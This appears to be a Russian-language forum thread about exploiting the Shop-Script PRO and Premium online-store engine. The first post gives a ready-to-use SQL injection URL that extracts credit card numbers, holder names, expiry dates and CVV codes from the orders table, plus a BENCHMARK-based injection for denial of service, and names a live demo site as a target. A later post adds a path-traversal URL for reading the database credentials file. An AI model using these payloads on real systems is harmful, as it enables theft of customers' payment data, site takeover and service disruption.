Если в Pro версии движка интернет магазина Shop Script в браузере вбить: http://адрес/admin.php?dpt=reports&sub=product_report&categoryID=-82+union+select+cc_number,cc_oldername,cc_expires,cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC То вы сможете попасть в админкуЕсли Safe Mode будет отключён то можете получить полный контроль над сайтом.Этому багу подвержены версии Shop-Script PRO и Shop-Script Premium все версии. Также возможно проведение DDos атаки путём http://адрес/admin.php?dpt=conf&sub=setting&settings_groupID=BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) Вот пример сайта http://www.shop-script-demo.com/pro/admin.php?dpt=reports&sub=product_report&categoryID=-82+union+select+cc_number,cc_oldername,cc_expires,cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC Только тут включён SafeMod
Может я туплю, но доступ в админку есть и так - http://www.shop-script-demo.com/pro/admin.php Как я понял это как бы демонстрация этого самого скрипта...показывается как выглядит там админка...и все... Поправьте, если ошибаюсь...
Короче, единственное что я смог найти, так это данные для подключения к БД, если очень повезёт они могут подойти и к админке. Надо только дописать /index.php?aux_page=../cfg/connect.inc.php Если вы перейдёте на это страничку но ничего не будет написано( если будет написано "документ не найден на сервере" то ничего не плучится) если ничего не будет, будет просто пусто на том месте где должны быть ньюски, то просто посмотрите сорцы, там будет часть кода типа db_username="" bd_password="" и т.д.
